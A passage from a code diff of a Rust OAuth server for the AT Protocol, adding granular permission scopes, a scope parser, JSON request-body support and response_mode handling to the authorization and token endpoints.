1354 + StatusCode::FORBIDDEN, 1355 "access_denied", 1356 + "Too many failed attempts. Please start over.", 1357 + ); 1358 } 1359 let code_valid: bool = form 1360 .code ··· 1364 .into(); 1365 if !code_valid { 1366 let _ = db::increment_2fa_attempts(&state.db, challenge.id).await; 1367 + return json_error( 1368 + StatusCode::FORBIDDEN, 1369 + "invalid_code", 1370 + "Invalid verification code. Please try again.", 1371 + ); 1372 } 1373 let _ = db::delete_2fa_challenge(&state.db, challenge.id).await; 1374 let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await { 1375 Ok(Some(d)) => d, 1376 Ok(None) => { 1377 + return json_error( 1378 + StatusCode::BAD_REQUEST, 1379 "invalid_request", 1380 + "Authorization request not found.", 1381 + ); 1382 } 1383 Err(_) => { 1384 + return json_error( 1385 + StatusCode::INTERNAL_SERVER_ERROR, 1386 "server_error", 1387 + "An error occurred.", 1388 + ); 1389 } 1390 }; 1391 let code = Code::generate(); ··· 1400 .await 1401 .is_err() 1402 { 1403 + return json_error( 1404 + StatusCode::INTERNAL_SERVER_ERROR, 1405 "server_error", 1406 + "An error occurred. Please try again.", 1407 + ); 1408 } 1409 let redirect_url = build_success_redirect( 1410 &request_data.parameters.redirect_uri, 1411 &code.0, 1412 request_data.parameters.state.as_deref(), 1413 + request_data.parameters.response_mode.as_deref(), 1414 ); 1415 + Json(serde_json::json!({ 1416 + "redirect_uri": redirect_url 1417 + })) 1418 + .into_response() 1419 }
+11
src/oauth/endpoints/metadata.rs
··· 79 "atproto".to_string(), 80 "transition:generic".to_string(), 81 "transition:chat.bsky".to_string(), 82 ]), 83 response_types_supported: vec!["code".to_string()], 84 response_modes_supported: Some(vec!["query".to_string(), "fragment".to_string()]),
··· 79 "atproto".to_string(), 80 "transition:generic".to_string(), 81 "transition:chat.bsky".to_string(), 82 + "repo:*".to_string(), 83 + "repo:*?action=create".to_string(), 84 + "repo:*?action=read".to_string(), 85 + "repo:*?action=update".to_string(), 86 + "repo:*?action=delete".to_string(), 87 + "blob:*/*".to_string(), 88 + "rpc:*".to_string(), 89 + "account:*".to_string(), 90 + "account:*?action=read".to_string(), 91 + "account:*?action=write".to_string(), 92 + "identity:*".to_string(), 93 ]), 94 response_types_supported: vec!["code".to_string()], 95 response_modes_supported: Some(vec!["query".to_string(), "fragment".to_string()]),
+91 -11
src/oauth/endpoints/par.rs
··· 1 use crate::oauth::{ 2 AuthorizationRequestParameters, ClientAuth, OAuthError, RequestData, RequestId, 3 - client::ClientMetadataCache, db, 4 }; 5 use crate::state::{AppState, RateLimitKind}; 6 - use axum::{Form, Json, extract::State, http::HeaderMap}; 7 use chrono::{Duration, Utc}; 8 use serde::{Deserialize, Serialize}; 9 10 const PAR_EXPIRY_SECONDS: i64 = 600; 11 - const SUPPORTED_SCOPES: &[&str] = &["atproto", "transition:generic", "transition:chat.bsky"]; 12 13 #[derive(Debug, Deserialize)] 14 pub struct ParRequest { ··· 23 pub code_challenge: Option<String>, 24 #[serde(default)] 25 pub code_challenge_method: Option<String>, 26 #[serde(default)] 27 pub login_hint: Option<String>, 28 #[serde(default)] ··· 44 pub async fn pushed_authorization_request( 45 State(state): State<AppState>, 46 headers: HeaderMap, 47 - Form(request): Form<ParRequest>, 48 ) -> Result<(axum::http::StatusCode, Json<ParResponse>), OAuthError> { 49 let client_ip = crate::rate_limit::extract_client_ip(&headers, None); 50 if !state 51 .check_rate_limit(RateLimitKind::OAuthPar, &client_ip) ··· 77 let validated_scope = validate_scope(&request.scope, &client_metadata)?; 78 let request_id = RequestId::generate(); 79 let expires_at = Utc::now() + Duration::seconds(PAR_EXPIRY_SECONDS); 80 let parameters = AuthorizationRequestParameters { 81 response_type: request.response_type, 82 client_id: request.client_id.clone(), ··· 85 state: request.state, 86 code_challenge: code_challenge.clone(), 87 code_challenge_method: code_challenge_method.to_string(), 88 login_hint: request.login_hint, 89 dpop_jkt: request.dpop_jkt, 90 extra: None, ··· 149 if requested_scopes.is_empty() { 150 return Ok(Some("atproto".to_string())); 151 } 152 for scope in &requested_scopes { 153 - if !SUPPORTED_SCOPES.contains(scope) { 154 - return Err(OAuthError::InvalidScope(format!( 155 - "Unsupported scope: {}. Supported scopes: {}", 156 - scope, 157 - SUPPORTED_SCOPES.join(", ") 158 - ))); 159 } 160 } 161 if let Some(client_scope) = &client_metadata.scope { 162 let client_scopes: Vec<&str> = client_scope.split_whitespace().collect(); 163 for scope in &requested_scopes { 164 - if !client_scopes.contains(scope) { 165 return Err(OAuthError::InvalidScope(format!( 166 "Scope '{}' not registered for this client", 167 scope ··· 171 } 172 Ok(Some(requested_scopes.join(" "))) 173 }
··· 1 use crate::oauth::{ 2 AuthorizationRequestParameters, ClientAuth, OAuthError, RequestData, RequestId, 3 + client::ClientMetadataCache, 4 + db, 5 + scopes::{ParsedScope, parse_scope}, 6 }; 7 use crate::state::{AppState, RateLimitKind}; 8 + use axum::body::Bytes; 9 + use axum::{Json, extract::State, http::HeaderMap}; 10 use chrono::{Duration, Utc}; 11 use serde::{Deserialize, Serialize}; 12 13 const PAR_EXPIRY_SECONDS: i64 = 600; 14 15 #[derive(Debug, Deserialize)] 16 pub struct ParRequest { ··· 25 pub code_challenge: Option<String>, 26 #[serde(default)] 27 pub code_challenge_method: Option<String>, 28 + #[serde(default)] 29 + pub response_mode: Option<String>, 30 #[serde(default)] 31 pub login_hint: Option<String>, 32 #[serde(default)] ··· 48 pub async fn pushed_authorization_request( 49 State(state): State<AppState>, 50 headers: HeaderMap, 51 + body: Bytes, 52 ) -> Result<(axum::http::StatusCode, Json<ParResponse>), OAuthError> { 53 + let content_type = headers 54 + .get("content-type") 55 + .and_then(|v| v.to_str().ok()) 56 + .unwrap_or(""); 57 + let request: ParRequest = if content_type.starts_with("application/json") { 58 + serde_json::from_slice(&body) 59 + .map_err(|e| OAuthError::InvalidRequest(format!("Invalid JSON: {}", e)))? 60 + } else if content_type.starts_with("application/x-www-form-urlencoded") { 61 + serde_urlencoded::from_bytes(&body) 62 + .map_err(|e| OAuthError::InvalidRequest(format!("Invalid form data: {}", e)))? 63 + } else { 64 + return Err(OAuthError::InvalidRequest( 65 + "Content-Type must be application/json or application/x-www-form-urlencoded" 66 + .to_string(), 67 + )); 68 + }; 69 let client_ip = crate::rate_limit::extract_client_ip(&headers, None); 70 if !state 71 .check_rate_limit(RateLimitKind::OAuthPar, &client_ip) ··· 97 let validated_scope = validate_scope(&request.scope, &client_metadata)?; 98 let request_id = RequestId::generate(); 99 let expires_at = Utc::now() + Duration::seconds(PAR_EXPIRY_SECONDS); 100 + let response_mode = match request.response_mode.as_deref() { 101 + Some("fragment") => Some("fragment".to_string()), 102 + Some("query") | None => None, 103 + Some(mode) => { 104 + return Err(OAuthError::InvalidRequest(format!( 105 + "Unsupported response_mode: {}", 106 + mode 107 + ))); 108 + } 109 + }; 110 let parameters = AuthorizationRequestParameters { 111 response_type: request.response_type, 112 client_id: request.client_id.clone(), ··· 115 state: request.state, 116 code_challenge: code_challenge.clone(), 117 code_challenge_method: code_challenge_method.to_string(), 118 + response_mode, 119 login_hint: request.login_hint, 120 dpop_jkt: request.dpop_jkt, 121 extra: None, ··· 180 if requested_scopes.is_empty() { 181 return Ok(Some("atproto".to_string())); 182 } 183 + let mut has_transition = false; 184 + let mut has_granular = false; 185 + 186 for scope in &requested_scopes { 187 + let parsed = parse_scope(scope); 188 + match &parsed { 189 + ParsedScope::Unknown(_) => { 190 + return Err(OAuthError::InvalidScope(format!( 191 + "Unsupported scope: {}", 192 + scope 193 + ))); 194 + } 195 + ParsedScope::TransitionGeneric 196 + | ParsedScope::TransitionChat 197 + | ParsedScope::TransitionEmail => { 198 + has_transition = true; 199 + } 200 + ParsedScope::Repo(_) 201 + | ParsedScope::Blob(_) 202 + | ParsedScope::Rpc(_) 203 + | ParsedScope::Account(_) 204 + | ParsedScope::Identity(_) 205 + | ParsedScope::Include(_) => { 206 + has_granular = true; 207 + } 208 + ParsedScope::Atproto => {} 209 } 210 } 211 + 212 + if has_transition && has_granular { 213 + return Err(OAuthError::InvalidScope( 214 + "Cannot mix transition scopes with granular scopes. Use either transition:* scopes OR granular scopes (repo:*, blob:*, rpc:*, account:*, include:*), not both.".to_string() 215 + )); 216 + } 217 + 218 if let Some(client_scope) = &client_metadata.scope { 219 let client_scopes: Vec<&str> = client_scope.split_whitespace().collect(); 220 for scope in &requested_scopes { 221 + if !client_scopes.iter().any(|cs| scope_matches(cs, scope)) { 222 return Err(OAuthError::InvalidScope(format!( 223 "Scope '{}' not registered for this client", 224 scope ··· 228 } 229 Ok(Some(requested_scopes.join(" "))) 230 } 231 + 232 + fn scope_matches(client_scope: &str, requested_scope: &str) -> bool { 233 + if client_scope == requested_scope { 234 + return true; 235 + } 236 + 237 + fn get_resource_type(scope: &str) -> &str { 238 + let base = scope.split('?').next().unwrap_or(scope); 239 + base.split(':').next().unwrap_or(base) 240 + } 241 + 242 + let client_type = get_resource_type(client_scope); 243 + let requested_type = get_resource_type(requested_scope); 244 + 245 + if client_type == requested_type { 246 + let client_base = client_scope.split('?').next().unwrap_or(client_scope); 247 + if client_base.contains('*') { 248 + return true; 249 + } 250 + } 251 + 252 + false 253 + }
+37 -20
src/oauth/endpoints/token/grants.rs
··· 36 )); 37 } 38 if let Some(request_client_id) = &request.client_id 39 - && request_client_id != &auth_request.client_id { 40 - return Err(OAuthError::InvalidGrant("client_id mismatch".to_string())); 41 - } 42 let did = auth_request 43 .did 44 .ok_or_else(|| OAuthError::InvalidGrant("Authorization not completed".to_string()))?; ··· 65 verify_client_auth(&client_metadata_cache, &client_metadata, &client_auth).await?; 66 verify_pkce(&auth_request.parameters.code_challenge, &code_verifier)?; 67 if let Some(redirect_uri) = &request.redirect_uri 68 - && redirect_uri != &auth_request.parameters.redirect_uri { 69 - return Err(OAuthError::InvalidGrant( 70 - "redirect_uri mismatch".to_string(), 71 - )); 72 - } 73 let dpop_jkt = if let Some(proof) = &dpop_proof { 74 let config = AuthConfig::get(); 75 let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes()); ··· 83 )); 84 } 85 if let Some(expected_jkt) = &auth_request.parameters.dpop_jkt 86 - && &result.jkt != expected_jkt { 87 - return Err(OAuthError::InvalidDpopProof( 88 - "DPoP key binding mismatch".to_string(), 89 - )); 90 - } 91 Some(result.jkt) 92 } else if auth_request.parameters.dpop_jkt.is_some() { 93 return Err(OAuthError::InvalidRequest( ··· 96 } else { 97 None 98 }; 99 let token_id = TokenId::generate(); 100 let refresh_token = RefreshToken::generate(); 101 let now = Utc::now(); 102 - let access_token = create_access_token(&token_id.0, &did, dpop_jkt.as_deref())?; 103 let token_data = TokenData { 104 did: did.clone(), 105 token_id: token_id.0.clone(), ··· 179 )); 180 } 181 if let Some(expected_jkt) = &token_data.parameters.dpop_jkt 182 - && &result.jkt != expected_jkt { 183 - return Err(OAuthError::InvalidDpopProof( 184 - "DPoP key binding mismatch".to_string(), 185 - )); 186 - } 187 Some(result.jkt) 188 } else if token_data.parameters.dpop_jkt.is_some() { 189 return Err(OAuthError::InvalidRequest( ··· 203 new_expires_at, 204 ) 205 .await?; 206 - let access_token = create_access_token(&new_token_id.0, &token_data.did, dpop_jkt.as_deref())?; 207 let mut response_headers = HeaderMap::new(); 208 let config = AuthConfig::get(); 209 let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes());
··· 36 )); 37 } 38 if let Some(request_client_id) = &request.client_id 39 + && request_client_id != &auth_request.client_id 40 + { 41 + return Err(OAuthError::InvalidGrant("client_id mismatch".to_string())); 42 + } 43 let did = auth_request 44 .did 45 .ok_or_else(|| OAuthError::InvalidGrant("Authorization not completed".to_string()))?; ··· 66 verify_client_auth(&client_metadata_cache, &client_metadata, &client_auth).await?; 67 verify_pkce(&auth_request.parameters.code_challenge, &code_verifier)?; 68 if let Some(redirect_uri) = &request.redirect_uri 69 + && redirect_uri != &auth_request.parameters.redirect_uri 70 + { 71 + return Err(OAuthError::InvalidGrant( 72 + "redirect_uri mismatch".to_string(), 73 + )); 74 + } 75 let dpop_jkt = if let Some(proof) = &dpop_proof { 76 let config = AuthConfig::get(); 77 let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes()); ··· 85 )); 86 } 87 if let Some(expected_jkt) = &auth_request.parameters.dpop_jkt 88 + && &result.jkt != expected_jkt 89 + { 90 + return Err(OAuthError::InvalidDpopProof( 91 + "DPoP key binding mismatch".to_string(), 92 + )); 93 + } 94 Some(result.jkt) 95 } else if auth_request.parameters.dpop_jkt.is_some() { 96 return Err(OAuthError::InvalidRequest( ··· 99 } else { 100 None 101 }; 102 + if let Err(e) = db::revoke_tokens_for_client(&state.db, &did, &auth_request.client_id).await { 103 + tracing::warn!("Failed to revoke previous tokens for client: {:?}", e); 104 + } 105 let token_id = TokenId::generate(); 106 let refresh_token = RefreshToken::generate(); 107 let now = Utc::now(); 108 + let access_token = create_access_token( 109 + &token_id.0, 110 + &did, 111 + dpop_jkt.as_deref(), 112 + auth_request.parameters.scope.as_deref(), 113 + )?; 114 let token_data = TokenData { 115 did: did.clone(), 116 token_id: token_id.0.clone(), ··· 190 )); 191 } 192 if let Some(expected_jkt) = &token_data.parameters.dpop_jkt 193 + && &result.jkt != expected_jkt 194 + { 195 + return Err(OAuthError::InvalidDpopProof( 196 + "DPoP key binding mismatch".to_string(), 197 + )); 198 + } 199 Some(result.jkt) 200 } else if token_data.parameters.dpop_jkt.is_some() { 201 return Err(OAuthError::InvalidRequest( ··· 215 new_expires_at, 216 ) 217 .await?; 218 + let access_token = create_access_token( 219 + &new_token_id.0, 220 + &token_data.did, 221 + dpop_jkt.as_deref(), 222 + token_data.scope.as_deref(), 223 + )?; 224 let mut response_headers = HeaderMap::new(); 225 let config = AuthConfig::get(); 226 let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes());
+3 -1
src/oauth/endpoints/token/helpers.rs
··· 36 token_id: &str, 37 sub: &str, 38 dpop_jkt: Option<&str>, 39 ) -> Result<String, OAuthError> { 40 use serde_json::json; 41 let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 42 let issuer = format!("https://{}", pds_hostname); 43 let now = Utc::now().timestamp(); 44 let exp = now + ACCESS_TOKEN_EXPIRY_SECONDS; 45 let mut payload = json!({ 46 "iss": issuer, 47 "sub": sub, ··· 49 "iat": now, 50 "exp": exp, 51 "jti": token_id, 52 - "scope": "atproto" 53 }); 54 if let Some(jkt) = dpop_jkt { 55 payload["cnf"] = json!({ "jkt": jkt });
··· 36 token_id: &str, 37 sub: &str, 38 dpop_jkt: Option<&str>, 39 + scope: Option<&str>, 40 ) -> Result<String, OAuthError> { 41 use serde_json::json; 42 let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 43 let issuer = format!("https://{}", pds_hostname); 44 let now = Utc::now().timestamp(); 45 let exp = now + ACCESS_TOKEN_EXPIRY_SECONDS; 46 + let actual_scope = scope.unwrap_or("atproto"); 47 let mut payload = json!({ 48 "iss": issuer, 49 "sub": sub, ··· 51 "iat": now, 52 "exp": exp, 53 "jti": token_id, 54 + "scope": actual_scope 55 }); 56 if let Some(jkt) = dpop_jkt { 57 payload["cnf"] = json!({ "jkt": jkt });
+27 -8
src/oauth/endpoints/token/mod.rs
··· 5 6 use crate::oauth::OAuthError; 7 use crate::state::{AppState, RateLimitKind}; 8 - use axum::{Form, Json, extract::State, http::HeaderMap}; 9 10 pub use grants::{handle_authorization_code_grant, handle_refresh_token_grant}; 11 pub use helpers::{TokenClaims, create_access_token, extract_token_claims, verify_pkce}; ··· 17 fn extract_client_ip(headers: &HeaderMap) -> String { 18 if let Some(forwarded) = headers.get("x-forwarded-for") 19 && let Ok(value) = forwarded.to_str() 20 - && let Some(first_ip) = value.split(',').next() { 21 - return first_ip.trim().to_string(); 22 - } 23 if let Some(real_ip) = headers.get("x-real-ip") 24 - && let Ok(value) = real_ip.to_str() { 25 - return value.trim().to_string(); 26 - } 27 "unknown".to_string() 28 } 29 30 pub async fn token_endpoint( 31 State(state): State<AppState>, 32 headers: HeaderMap, 33 - Form(request): Form<TokenRequest>, 34 ) -> Result<(HeaderMap, Json<TokenResponse>), OAuthError> { 35 let client_ip = extract_client_ip(&headers); 36 if !state 37 .check_rate_limit(RateLimitKind::OAuthToken, &client_ip)
··· 5 6 use crate::oauth::OAuthError; 7 use crate::state::{AppState, RateLimitKind}; 8 + use axum::body::Bytes; 9 + use axum::{Json, extract::State, http::HeaderMap}; 10 11 pub use grants::{handle_authorization_code_grant, handle_refresh_token_grant}; 12 pub use helpers::{TokenClaims, create_access_token, extract_token_claims, verify_pkce}; ··· 18 fn extract_client_ip(headers: &HeaderMap) -> String { 19 if let Some(forwarded) = headers.get("x-forwarded-for") 20 && let Ok(value) = forwarded.to_str() 21 + && let Some(first_ip) = value.split(',').next() 22 + { 23 + return first_ip.trim().to_string(); 24 + } 25 if let Some(real_ip) = headers.get("x-real-ip") 26 + && let Ok(value) = real_ip.to_str() 27 + { 28 + return value.trim().to_string(); 29 + } 30 "unknown".to_string() 31 } 32 33 pub async fn token_endpoint( 34 State(state): State<AppState>, 35 headers: HeaderMap, 36 + body: Bytes, 37 ) -> Result<(HeaderMap, Json<TokenResponse>), OAuthError> { 38 + let content_type = headers 39 + .get("content-type") 40 + .and_then(|v| v.to_str().ok()) 41 + .unwrap_or(""); 42 + let request: TokenRequest = if content_type.starts_with("application/json") { 43 + serde_json::from_slice(&body) 44 + .map_err(|e| OAuthError::InvalidRequest(format!("Invalid JSON: {}", e)))? 45 + } else if content_type.starts_with("application/x-www-form-urlencoded") { 46 + serde_urlencoded::from_bytes(&body) 47 + .map_err(|e| OAuthError::InvalidRequest(format!("Invalid form data: {}", e)))? 48 + } else { 49 + return Err(OAuthError::InvalidRequest( 50 + "Content-Type must be application/json or application/x-www-form-urlencoded" 51 + .to_string(), 52 + )); 53 + }; 54 let client_ip = extract_client_ip(&headers); 55 if !state 56 .check_rate_limit(RateLimitKind::OAuthToken, &client_ip)
+2 -2
src/oauth/mod.rs
··· 4 pub mod endpoints; 5 pub mod error; 6 pub mod jwks; 7 - pub mod templates; 8 pub mod types; 9 pub mod verify; 10 11 pub use error::OAuthError; 12 - pub use templates::{DeviceAccount, mask_email}; 13 pub use types::*; 14 pub use verify::{ 15 OAuthAuthError, OAuthUser, VerifyResult, generate_dpop_nonce, verify_oauth_access_token,
··· 4 pub mod endpoints; 5 pub mod error; 6 pub mod jwks; 7 + pub mod scopes; 8 pub mod types; 9 pub mod verify; 10 11 pub use error::OAuthError; 12 + pub use scopes::{AccountAction, AccountAttr, RepoAction, ScopeError, ScopePermissions}; 13 pub use types::*; 14 pub use verify::{ 15 OAuthAuthError, OAuthUser, VerifyResult, generate_dpop_nonce, verify_oauth_access_token,
+134
src/oauth/scopes/definitions.rs
···
··· 1 + use std::collections::HashMap; 2 + use std::sync::LazyLock; 3 + 4 + #[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)] 5 + pub enum ScopeCategory { 6 + Core, 7 + Transition, 8 + Repo, 9 + Blob, 10 + Rpc, 11 + Account, 12 + } 13 + 14 + impl ScopeCategory { 15 + pub fn display_name(&self) -> &'static str { 16 + match self { 17 + ScopeCategory::Core => "Core Access", 18 + ScopeCategory::Transition => "Transition", 19 + ScopeCategory::Repo => "Repository", 20 + ScopeCategory::Blob => "Media", 21 + ScopeCategory::Rpc => "API Access", 22 + ScopeCategory::Account => "Account", 23 + } 24 + } 25 + } 26 + 27 + #[derive(Debug, Clone)] 28 + pub struct ScopeDefinition { 29 + pub scope: &'static str, 30 + pub category: ScopeCategory, 31 + pub required: bool, 32 + pub description: &'static str, 33 + pub display_name: &'static str, 34 + } 35 + 36 + pub static SCOPE_DEFINITIONS: LazyLock<HashMap<&'static str, ScopeDefinition>> = 37 + LazyLock::new(|| { 38 + let definitions = vec![ 39 + ScopeDefinition { 40 + scope: "atproto", 41 + category: ScopeCategory::Core, 42 + required: true, 43 + description: "Use AT Protocol OAuth (required for all sessions)", 44 + display_name: "AT Protocol", 45 + }, 46 + ScopeDefinition { 47 + scope: "transition:generic", 48 + category: ScopeCategory::Transition, 49 + required: false, 50 + description: "Generic transition scope for compatibility", 51 + display_name: "Transition Access", 52 + }, 53 + ScopeDefinition { 54 + scope: "transition:chat.bsky", 55 + category: ScopeCategory::Transition, 56 + required: false, 57 + description: "Access to Bluesky chat features", 58 + display_name: "Chat Access", 59 + }, 60 + ScopeDefinition { 61 + scope: "transition:email", 62 + category: ScopeCategory::Account, 63 + required: false, 64 + description: "Read your account email address", 65 + display_name: "Email Access", 66 + }, 67 + ScopeDefinition { 68 + scope: "repo:*?action=create", 69 + category: ScopeCategory::Repo, 70 + required: false, 71 + description: "Create new records in your repository", 72 + display_name: "Create Records", 73 + }, 74 + ScopeDefinition { 75 + scope: "repo:*?action=update", 76 + category: ScopeCategory::Repo, 77 + required: false, 78 + description: "Update existing records in your repository", 79 + display_name: "Update Records", 80 + }, 81 + ScopeDefinition { 82 + scope: "repo:*?action=delete", 83 + category: ScopeCategory::Repo, 84 + required: false, 85 + description: "Delete records from your repository", 86 + display_name: "Delete Records", 87 + }, 88 + ScopeDefinition { 89 + scope: "blob:*/*", 90 + category: ScopeCategory::Blob, 91 + required: false, 92 + description: "Upload images, videos, and other media files", 93 + display_name: "Upload Media", 94 + }, 95 + ]; 96 + 97 + definitions.into_iter().map(|d| (d.scope, d)).collect() 98 + }); 99 + 100 + #[allow(dead_code)] 101 + pub fn get_scope_definition(scope: &str) -> Option<&'static ScopeDefinition> { 102 + SCOPE_DEFINITIONS.get(scope) 103 + } 104 + 105 + #[allow(dead_code)] 106 + pub fn is_valid_scope(scope: &str) -> bool { 107 + if SCOPE_DEFINITIONS.contains_key(scope) { 108 + return true; 109 + } 110 + if scope.starts_with("ref:") { 111 + return true; 112 + } 113 + false 114 + } 115 + 116 + #[allow(dead_code)] 117 + pub fn get_required_scopes() -> Vec<&'static str> { 118 + SCOPE_DEFINITIONS 119 + .values() 120 + .filter(|d| d.required) 121 + .map(|d| d.scope) 122 + .collect() 123 + } 124 + 125 + #[allow(dead_code)] 126 + pub fn format_scope_for_display(scope: &str) -> String { 127 + if let Some(def) = get_scope_definition(scope) { 128 + def.description.to_string() 129 + } else if scope.starts_with("ref:") { 130 + "Referenced scope".to_string() 131 + } else { 132 + format!("Access to {}", scope) 133 + } 134 + }
+39
src/oauth/scopes/error.rs
···
··· 1 + use axum::http::StatusCode; 2 + use axum::response::{IntoResponse, Response}; 3 + use serde_json::json; 4 + 5 + #[derive(Debug, Clone)] 6 + pub enum ScopeError { 7 + InsufficientScope { required: String, message: String }, 8 + InvalidScope(String), 9 + } 10 + 11 + impl std::fmt::Display for ScopeError { 12 + fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { 13 + match self { 14 + ScopeError::InsufficientScope { message, .. } => write!(f, "{}", message), 15 + ScopeError::InvalidScope(msg) => write!(f, "Invalid scope: {}", msg), 16 + } 17 + } 18 + } 19 + 20 + impl std::error::Error for ScopeError {} 21 + 22 + impl IntoResponse for ScopeError { 23 + fn into_response(self) -> Response { 24 + let (status, error_code, message) = match &self { 25 + ScopeError::InsufficientScope { message, .. } => { 26 + (StatusCode::FORBIDDEN, "InsufficientScope", message.clone()) 27 + } 28 + ScopeError::InvalidScope(msg) => (StatusCode::BAD_REQUEST, "InvalidScope", msg.clone()), 29 + }; 30 + ( 31 + status, 32 + axum::Json(json!({ 33 + "error": error_code, 34 + "message": message 35 + })), 36 + ) 37 + .into_response() 38 + } 39 + }
+12
src/oauth/scopes/mod.rs
···
··· 1 + mod definitions; 2 + mod error; 3 + mod parser; 4 + mod permissions; 5 + 6 + pub use definitions::{SCOPE_DEFINITIONS, ScopeCategory, ScopeDefinition}; 7 + pub use error::ScopeError; 8 + pub use parser::{ 9 + AccountAction, AccountAttr, AccountScope, BlobScope, IdentityAttr, IdentityScope, IncludeScope, 10 + ParsedScope, RepoAction, RepoScope, RpcScope, parse_scope, parse_scope_string, 11 + }; 12 + pub use permissions::ScopePermissions;
+483
src/oauth/scopes/parser.rs
···
··· 1 + use std::collections::{HashMap, HashSet}; 2 + 3 + #[derive(Debug, Clone, PartialEq, Eq)] 4 + pub enum ParsedScope { 5 + Atproto, 6 + TransitionGeneric, 7 + TransitionChat, 8 + TransitionEmail, 9 + Repo(RepoScope), 10 + Blob(BlobScope), 11 + Rpc(RpcScope), 12 + Account(AccountScope), 13 + Identity(IdentityScope), 14 + Include(IncludeScope), 15 + Unknown(String), 16 + } 17 + 18 + #[derive(Debug, Clone, PartialEq, Eq)] 19 + pub struct IncludeScope { 20 + pub nsid: String, 21 + pub aud: Option<String>, 22 + } 23 + 24 + #[derive(Debug, Clone, PartialEq, Eq)] 25 + pub struct RepoScope { 26 + pub collection: Option<String>, 27 + pub actions: HashSet<RepoAction>, 28 + } 29 + 30 + #[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)] 31 + pub enum RepoAction { 32 + Create, 33 + Update, 34 + Delete, 35 + } 36 + 37 + impl RepoAction { 38 + pub fn parse_str(s: &str) -> Option<Self> { 39 + match s { 40 + "create" => Some(Self::Create), 41 + "update" => Some(Self::Update), 42 + "delete" => Some(Self::Delete), 43 + _ => None, 44 + } 45 + } 46 + } 47 + 48 + #[derive(Debug, Clone, PartialEq, Eq)] 49 + pub struct BlobScope { 50 + pub accept: HashSet<String>, 51 + } 52 + 53 + impl BlobScope { 54 + pub fn matches_mime(&self, mime: &str) -> bool { 55 + if self.accept.is_empty() || self.accept.contains("*/*") { 56 + return true; 57 + } 58 + for pattern in &self.accept { 59 + if pattern == mime { 60 + return true; 61 + } 62 + if let Some(prefix) = pattern.strip_suffix("/*") 63 + && mime.starts_with(prefix) 64 + && mime.chars().nth(prefix.len()) == Some('/') 65 + { 66 + return true; 67 + } 68 + } 69 + false 70 + } 71 + } 72 + 73 + #[derive(Debug, Clone, PartialEq, Eq)] 74 + pub struct RpcScope { 75 + pub lxm: Option<String>, 76 + pub aud: Option<String>, 77 + } 78 + 79 + #[derive(Debug, Clone, PartialEq, Eq)] 80 + pub struct AccountScope { 81 + pub attr: AccountAttr, 82 + pub action: AccountAction, 83 + } 84 + 85 + #[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)] 86 + pub enum AccountAttr { 87 + Email, 88 + Handle, 89 + Repo, 90 + Status, 91 + } 92 + 93 + #[derive(Debug, Clone, PartialEq, Eq)] 94 + pub struct IdentityScope { 95 + pub attr: IdentityAttr, 96 + } 97 + 98 + #[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)] 99 + pub enum IdentityAttr { 100 + Handle, 101 + Wildcard, 102 + } 103 + 104 + impl AccountAttr { 105 + pub fn parse_str(s: &str) -> Option<Self> { 106 + match s { 107 + "email" => Some(Self::Email), 108 + "handle" => Some(Self::Handle), 109 + "repo" => Some(Self::Repo), 110 + "status" => Some(Self::Status), 111 + _ => None, 112 + } 113 + } 114 + } 115 + 116 + impl IdentityAttr { 117 + pub fn parse_str(s: &str) -> Option<Self> { 118 + match s { 119 + "handle" => Some(Self::Handle), 120 + "*" => Some(Self::Wildcard), 121 + _ => None, 122 + } 123 + } 124 + } 125 + 126 + #[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)] 127 + pub enum AccountAction { 128 + Read, 129 + Manage, 130 + } 131 + 132 + impl AccountAction { 133 + pub fn parse_str(s: &str) -> Option<Self> { 134 + match s { 135 + "read" => Some(Self::Read), 136 + "manage" => Some(Self::Manage), 137 + _ => None, 138 + } 139 + } 140 + } 141 + 142 + fn parse_query_params(query: &str) -> HashMap<String, Vec<String>> { 143 + let mut params: HashMap<String, Vec<String>> = HashMap::new(); 144 + for part in query.split('&') { 145 + if let Some((key, value)) = part.split_once('=') { 146 + params 147 + .entry(key.to_string()) 148 + .or_default() 149 + .push(value.to_string()); 150 + } 151 + } 152 + params 153 + } 154 + 155 + pub fn parse_scope(scope: &str) -> ParsedScope { 156 + match scope { 157 + "atproto" => return ParsedScope::Atproto, 158 + "transition:generic" => return ParsedScope::TransitionGeneric, 159 + "transition:chat.bsky" => return ParsedScope::TransitionChat, 160 + "transition:email" => return ParsedScope::TransitionEmail, 161 + _ => {} 162 + } 163 + 164 + let (base, query) = scope.split_once('?').unwrap_or((scope, "")); 165 + let params = parse_query_params(query); 166 + 167 + if let Some(rest) = base.strip_prefix("repo:") { 168 + let collection = if rest == "*" || rest.is_empty() { 169 + None 170 + } else { 171 + Some(rest.to_string()) 172 + }; 173 + 174 + let mut actions = HashSet::new(); 175 + if let Some(action_values) = params.get("action") { 176 + for action_str in action_values { 177 + if let Some(action) = RepoAction::parse_str(action_str) { 178 + actions.insert(action); 179 + } 180 + } 181 + } 182 + if actions.is_empty() { 183 + actions.insert(RepoAction::Create); 184 + actions.insert(RepoAction::Update); 185 + actions.insert(RepoAction::Delete); 186 + } 187 + 188 + return ParsedScope::Repo(RepoScope { 189 + collection, 190 + actions, 191 + }); 192 + } 193 + 194 + if base == "repo" { 195 + let mut actions = HashSet::new(); 196 + if let Some(action_values) = params.get("action") { 197 + for action_str in action_values { 198 + if let Some(action) = RepoAction::parse_str(action_str) { 199 + actions.insert(action); 200 + } 201 + } 202 + } 203 + if actions.is_empty() { 204 + actions.insert(RepoAction::Create); 205 + actions.insert(RepoAction::Update); 206 + actions.insert(RepoAction::Delete); 207 + } 208 + return ParsedScope::Repo(RepoScope { 209 + collection: None, 210 + actions, 211 + }); 212 + } 213 + 214 + if base.starts_with("blob") { 215 + let positional = base.strip_prefix("blob:").unwrap_or(""); 216 + let mut accept = HashSet::new(); 217 + 218 + if !positional.is_empty() { 219 + 